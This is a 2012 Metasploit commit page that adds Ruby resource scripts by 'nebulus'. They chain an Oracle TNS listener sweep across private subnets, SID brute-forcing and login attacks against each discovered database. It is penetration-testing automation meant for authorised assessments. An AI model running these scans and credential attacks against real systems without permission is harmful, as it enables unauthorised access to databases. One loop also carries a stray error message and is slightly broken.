Permalink
Browse files

Adding oracle RC scripts from nebulus

Also adds at least title/attribution to the scripts. Should probably get
a proper format for that if we get more of these bad boys.

[Fixes #6145]
  • Loading branch information...
1 parent 03a39f7 commit 51a7f05d8574d6338eee516d4823951fd943dd18 @todb todb committed Jan 9, 2012
@@ -0,0 +1,66 @@
+# oracle_login.rc
+# Author: nebulus
+
+<ruby>
+
+hosts = {}
+host_id_to_ip = {}
+
+# map hosts ip to host_id
+
+begin
+ framework.db.hosts.each do |host|
+ # don't really like having to do that but only way I could tie them together as notes were missing ip
+ host_id_to_ip[host.id] = host.address
+ end
+ rescue ActiveRecord::ConnectionNotEstablished
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+
+end
+
+begin
+ framework.db.notes.each do |note|
+ if ( note.ntype == 'oracle_sid' )
+ data = note.data
+ if(data =~ /PORT=(\d+), SID=(\S*)$/)
+ ip = host_id_to_ip[note.host_id]
+ port = "#{$1}"
+ sid = "#{$2}"
+ if(sid != '')
+ hosts["#{ip}"] = {'RPORT' => port, 'SID' => sid}
+ end
+ else
+ puts "Bad regexp (#{note.inspect})"
+ end
+ end
+ end
+ rescue ActiveRecord::ConnectionNotEstablished
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+end
+
+self.run_single("use auxiliary/admin/oracle/oracle_login")
+
+hosts.each do |rhost|
+ begin
+ self.run_single("set RHOST #{rhost[0]}")
+ self.run_single("set RPORT #{rhost[1]['RPORT']}")
+ self.run_single("set SID #{rhost[1]['SID']}")
+ self.run_single('exploit')
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+ end
+
+end
+</ruby>
+
@@ -0,0 +1,34 @@
+# oracle_sids.rc
+# Author: nebulus
+
+<ruby>
+
+hosts = []
+
+begin
+ framework.db.services.each do |service|
+ if ( (service.port == 1521 or service.port == 1522 or service.port == 1526) and (service.name =~ /oracle/i) and service.state == 'open')
+ hosts << {'ip' => service.host.address, 'port' => service.port}
+ end
+ end
+ rescue ActiveRecord::ConnectionNotEstablished
+ puts "DB not connected..."
+# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out)
+# self.run_single('db_connect <creds>')
+# puts "trying again..."
+# retry
+end
+
+
+self.run_single("use auxiliary/admin/oracle/sid_brute")
+
+hosts.each do |rhost|
+
+ self.run_single("set RHOST #{rhost['ip']}")
+ self.run_single("set RPORT #{rhost['port']}")
+ self.run_single('set ConnectTimeout 5')
+ self.run_single('run')
+ sleep 1
+end
+</ruby>
+
@@ -0,0 +1,28 @@
+# oracle_tns.rc
+# Author: nebulus
+
+<ruby>
+
+hosts = [
+'10.1.1.0/24',
+'10.1.2.1',
+'192.168.0.0/16'
+]
+
+ports = ['1521', '1522', '1526']
+
+self.run_single("use auxiliary/scanner/oracle/tnslsnr_version")
+
+hosts.each do |net|
+ ports.each do |port|
+ self.run_single("set RHOSTS #{net}")
+ self.run_single("set THREADS 128")
+ self.run_single("set RPORT #{port}")
+ self.run_single('set ConnectTimeout 5')
+ self.run_single('set VERBOSE false')
+ self.run_single('run')
+ sleep 1
+ end
+end
+</ruby>
+
@@ -1,3 +1,6 @@
+# run_all_post.rc
+# Author: mubix
+
# This is a sample resource script demonstrating a technique of running
# a single post module against several active sessions at once. The post
# module should be the currently active module, with sessions from other

0 comments on commit 51a7f05

Please sign in to comment.